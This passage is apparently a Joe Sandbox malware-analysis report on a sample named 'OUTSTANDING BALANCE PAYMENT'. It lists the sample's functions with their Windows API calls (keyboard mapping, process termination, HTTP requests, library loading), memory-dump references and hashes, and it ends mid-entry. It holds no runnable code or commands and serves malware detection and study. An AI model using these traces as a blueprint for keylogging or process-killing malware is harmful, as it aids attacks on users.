                                                                  • Instruction ID: 943dff9311db94638e8ebd0a0a787b862e47f8cbcbee2f944af7502e6897b9a6
                                                                  • Opcode Fuzzy Hash: 9af0cd3624e1ec2b918049f256f770244f3ef5d3937ccbc741afd48951ae1abd
                                                                  • Instruction Fuzzy Hash: 27F0967213D7121BE6257B747D0664B26D49F03738F240A99F9A0C90D2FF21887149B8
                                                                  Function 002827EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0028281D
                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00282825
                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00282830
                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0028283B
                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00282843
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0028284B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual
                                                                  • String ID:
                                                                  • API String ID: 4278518827-0
                                                                  • Opcode ID: 128603aeb1e0312f934cf99e038b79898b84780dbcef17bf34347c030c20e866
                                                                  • Instruction ID: 806e401123f7d519c29e5fd15638243b9dfd63709de690a5e5a87b98c02b46a6
                                                                  • Opcode Fuzzy Hash: 128603aeb1e0312f934cf99e038b79898b84780dbcef17bf34347c030c20e866
                                                                  • Instruction Fuzzy Hash: 8A0144B0902B5ABDE3008F6A8C85A52FEA8FF19354F00411BA15C47A42C7B5A864CBE5
                                                                  Function 002C9AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                  • String ID:
                                                                  • API String ID: 1423608774-0
                                                                  • Opcode ID: 194e09d292aae78d1950681beef55bf85ca866d20dec14edb6d511b1e29337f5
                                                                  • Instruction ID: b90a3a0e2e4c0e1d11fdae1d3045453d8591a5db5f6cd59798497d0816813dfc
                                                                  • Opcode Fuzzy Hash: 194e09d292aae78d1950681beef55bf85ca866d20dec14edb6d511b1e29337f5
                                                                  • Instruction Fuzzy Hash: 64018132113612ABD7161F98EC6CEEB77ADFF88701B140A2EF503924A4DB75A860DB50
                                                                  Function 002C7BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 002C7C07
                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002C7C1D
                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 002C7C2C
                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002C7C3B
                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002C7C45
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002C7C4C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                  • String ID:
                                                                  • API String ID: 839392675-0
                                                                  • Opcode ID: f2d1b8ee8e3b19060c6bedc042e3746b223df57cb196b75f13a1cb0474280877
                                                                  • Instruction ID: 43acadf22712f38c50a22f0de0f4b11743b008decee5a38a1b51e14ffcb46dd9
                                                                  • Opcode Fuzzy Hash: f2d1b8ee8e3b19060c6bedc042e3746b223df57cb196b75f13a1cb0474280877
                                                                  • Instruction Fuzzy Hash: D8F0BE72202158BBE7221B929C0EEEF3FBCEFC6B11F00001AFA01D2051DBA11A41C6B5
                                                                  Function 002C9A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 002C9A33
                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,002F5DEE,?,?,?,?,?,0028ED63), ref: 002C9A44
                                                                  • TerminateThread.KERNEL32(?,000001F6,?,?,?,002F5DEE,?,?,?,?,?,0028ED63), ref: 002C9A51
                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,002F5DEE,?,?,?,?,?,0028ED63), ref: 002C9A5E
                                                                    • Part of subcall function 002C93D1: CloseHandle.KERNEL32(?,?,002C9A6B,?,?,?,002F5DEE,?,?,?,?,?,0028ED63), ref: 002C93DB
                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 002C9A71
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,002F5DEE,?,?,?,?,?,0028ED63), ref: 002C9A78
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                  • String ID:
                                                                  • API String ID: 3495660284-0
                                                                  • Opcode ID: f4fe9e6dbcc48c4742fca3c86a8b9f90afcecf9745d1c31196a4ae89b9e81d43
                                                                  • Instruction ID: eb4e5d8ed94720507570da8240946ca949564aab9bb41475c6c369e44beec700
                                                                  • Opcode Fuzzy Hash: f4fe9e6dbcc48c4742fca3c86a8b9f90afcecf9745d1c31196a4ae89b9e81d43
                                                                  • Instruction Fuzzy Hash: 6EF05E32142212ABD7121BE4EC9DEAA77ADFF88301F140926F603914A4DB759951DB50
                                                                  Function 00281CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0029F4EA: std::exception::exception.LIBCMT ref: 0029F51E
                                                                    • Part of subcall function 0029F4EA: __CxxThrowException@8.LIBCMT ref: 0029F533
                                                                  • __swprintf.LIBCMT ref: 00281EA6
                                                                  Strings
                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00281D49
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                  • API String ID: 2125237772-557222456
                                                                  • Opcode ID: bd6156c028cb7d74f44a326857a949f0ca5eec7b007d6f07b8310522d85902d7
                                                                  • Instruction ID: 2e8c1906706a3ad8c991d187ac891fcfb90170f2de4f46a9a4a8d1e3209ad5df
                                                                  • Opcode Fuzzy Hash: bd6156c028cb7d74f44a326857a949f0ca5eec7b007d6f07b8310522d85902d7
                                                                  • Instruction Fuzzy Hash: 0991BA791252069FC724FF24C986C7AB7A8AF85740F10092DF986972E1DB70ED25CB92
                                                                  Function 002DAFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 002DB006
                                                                  • CharUpperBuffW.USER32(?,?), ref: 002DB115
                                                                  • VariantClear.OLEAUT32(?), ref: 002DB298
                                                                    • Part of subcall function 002C9DC5: VariantInit.OLEAUT32(00000000), ref: 002C9E05
                                                                    • Part of subcall function 002C9DC5: VariantCopy.OLEAUT32(?,?), ref: 002C9E0E
                                                                    • Part of subcall function 002C9DC5: VariantClear.OLEAUT32(?), ref: 002C9E1A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                  • API String ID: 4237274167-1221869570
                                                                  • Opcode ID: 19baa5d932b6375d6d0506ed9b9ac865b83e135d912d1aa30d11bff3ca0b7023
                                                                  • Instruction ID: 7ab130f147b1a2d5639e73e42130e79cce63d6e38d6b923dd72c2e8436ee9924
                                                                  • Opcode Fuzzy Hash: 19baa5d932b6375d6d0506ed9b9ac865b83e135d912d1aa30d11bff3ca0b7023
                                                                  • Instruction Fuzzy Hash: 3E919C35618302DFCB11EF24C49595AB7E4AF88704F14886EF89A8B3A2DB31ED55CB52
                                                                  Function 002C5347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0029C6F4: _wcscpy.LIBCMT ref: 0029C717
                                                                  • _memset.LIBCMT ref: 002C5438
                                                                  • GetMenuItemInfoW.USER32(?), ref: 002C5467
                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002C5513
                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 002C553D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                  • String ID: 0
                                                                  • API String ID: 4152858687-4108050209
                                                                  • Opcode ID: dc51790f350a3c56b3591d122bade98695fa848888a64258f88bf0776cd2534f
                                                                  • Instruction ID: 39cc536787ceeacbfef481748c9fa9214af2c8e7182fe15f6f43377538f2da98
                                                                  • Opcode Fuzzy Hash: dc51790f350a3c56b3591d122bade98695fa848888a64258f88bf0776cd2534f
                                                                  • Instruction Fuzzy Hash: CF510231534B629BD715AF28C840F6BB7E8AF953A0F44072DF895D3190DBA0EDE08B52
                                                                  Function 002C0213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002C027B
                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 002C02B1
                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 002C02C2
                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002C0344
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                  • String ID: DllGetClassObject
                                                                  • API String ID: 753597075-1075368562
                                                                  • Opcode ID: 87ad1b6912f75f84f726a39676adb1d4e3cb006d6edfc9a5c6ec7c2bcf1b3cfb
                                                                  • Instruction ID: 347e1d6444a5ae627287aa8b877b882664994d00699be523d307111e9b47e299
                                                                  • Opcode Fuzzy Hash: 87ad1b6912f75f84f726a39676adb1d4e3cb006d6edfc9a5c6ec7c2bcf1b3cfb
                                                                  • Instruction Fuzzy Hash: D44179B1614204EFDB05CF54C8D4F9ABBB9EF84310F1482AEE9099F206D7B1DA50CBA0
                                                                  Function 002C5007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002C5075
                                                                  • GetMenuItemInfoW.USER32 ref: 002C5091
                                                                  • DeleteMenu.USER32(00000004,00000007,00000000), ref: 002C50D7
                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00341708,00000000), ref: 002C5120
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                  • String ID: 0
                                                                  • API String ID: 1173514356-4108050209
                                                                  • Opcode ID: 4f874786ff7ab90a22e374654692e54512c111002b10360fbf254bf40cb0c035
                                                                  • Instruction ID: 5c0d60a017465df3286c4a0ec5705396674de163fc643f0454636827b04376b5
                                                                  • Opcode Fuzzy Hash: 4f874786ff7ab90a22e374654692e54512c111002b10360fbf254bf40cb0c035
                                                                  • Instruction Fuzzy Hash: B141C0312157129FD720DF24DC88F6ABBE8AF89324F08471EF85997291D770E960CB62
                                                                  Function 002CE698 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 002CE742
                                                                  • GetLastError.KERNEL32(?,00000000), ref: 002CE768
                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002CE78D
                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002CE7B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                  • String ID: p1#v`K$v
                                                                  • API String ID: 3321077145-1068180069
                                                                  • Opcode ID: e7755fff86e31ffa92153e8e80559887d1ef3bcc0a99e9ae9867349d59d7b21b
                                                                  • Instruction ID: 614d39b820aa5ca7153bdefaba678986e8801cea982e8a7be8aeb88305f1fcb2
                                                                  • Opcode Fuzzy Hash: e7755fff86e31ffa92153e8e80559887d1ef3bcc0a99e9ae9867349d59d7b21b
                                                                  • Instruction Fuzzy Hash: 2C413239210611DFCF12AF14C845A5DBBE5BF89720F098489E906AB3A2CB30FD64DF81
                                                                  Function 002E0567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharLowerBuffW.USER32(?,?,?,?), ref: 002E0587
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharLower
                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                  • API String ID: 2358735015-567219261
                                                                  • Opcode ID: 3c26dfe3f424e7630b0f275310570fd0fab7c167c9579fbbb82e1c7670a5efc1
                                                                  • Instruction ID: 992d2e999b67fbec4df533087e4f811326da970eba4d679c3506b90b17dd342e
                                                                  • Opcode Fuzzy Hash: 3c26dfe3f424e7630b0f275310570fd0fab7c167c9579fbbb82e1c7670a5efc1
                                                                  • Instruction Fuzzy Hash: 0E31E334520246ABCF00EF55C881AAEB3B8FF44314B50462AE426A77D1DBB1E966CF50
                                                                  Function 002BB80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 002BB88E
                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 002BB8A1
                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 002BB8D1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 3850602802-1403004172
                                                                  • Opcode ID: cef56097933a289031fff0c18985257b53e40d8734b29bbc110aebc32b38b86f
                                                                  • Instruction ID: 5ed129bac62d8cbd1935cbc6097043f2db9c7ab37ba6a50f6774a2afdca8deec
                                                                  • Opcode Fuzzy Hash: cef56097933a289031fff0c18985257b53e40d8734b29bbc110aebc32b38b86f
                                                                  • Instruction Fuzzy Hash: 9D21E179921108AFDB19AFA4D88A9FF77BCDF05394F504129F021A21E1DBB44D269B60
                                                                  Function 002D43E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002D4401
                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002D4427
                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 002D4457
                                                                  • InternetCloseHandle.WININET(00000000), ref: 002D449E
                                                                    • Part of subcall function 002D5052: GetLastError.KERNEL32(?,?,002D43CC,00000000,00000000,00000001), ref: 002D5067
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                  • String ID:
                                                                  • API String ID: 1951874230-3916222277
                                                                  • Opcode ID: d7171411762e8fcabf58c5c496859c3d8884f74697ac81351b3c31e4821c7b90
                                                                  • Instruction ID: 2c06a3675c7bbd3dcc8b16a442e29050c31c26b6926f54c3502450e521e09052
                                                                  • Opcode Fuzzy Hash: d7171411762e8fcabf58c5c496859c3d8884f74697ac81351b3c31e4821c7b90
                                                                  • Instruction Fuzzy Hash: 2D219FB2510208BFE712AF94CC85EBFB6ECFB48B58F10801BF109E2240EA748D559B71
                                                                  Function 002E90E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0029D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0029D1BA
                                                                    • Part of subcall function 0029D17C: GetStockObject.GDI32(00000011), ref: 0029D1CE
                                                                    • Part of subcall function 0029D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0029D1D8
                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 002E915C
                                                                  • LoadLibraryW.KERNEL32(?), ref: 002E9163
                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002E9178
                                                                  • DestroyWindow.USER32(?), ref: 002E9180
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                  • String ID: SysAnimate32
                                                                  • API String ID: 4146253029-1011021900
                                                                  • Opcode ID: e3a7dafac96e2b5b3b68ea0ec16b590a2695cd61d927dd7ee8762194407f6f3c
                                                                  • Instruction ID: d2d7e10019abfca4c393d6390a9f89d20277efc80e438b00309e28aedb8a37e2
                                                                  • Opcode Fuzzy Hash: e3a7dafac96e2b5b3b68ea0ec16b590a2695cd61d927dd7ee8762194407f6f3c
                                                                  • Instruction Fuzzy Hash: 3321D471260247BBEF204F66DC84FBB37ADEF55364F90021AF9589A190C771DCA1AB60
                                                                  Function 002C9568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
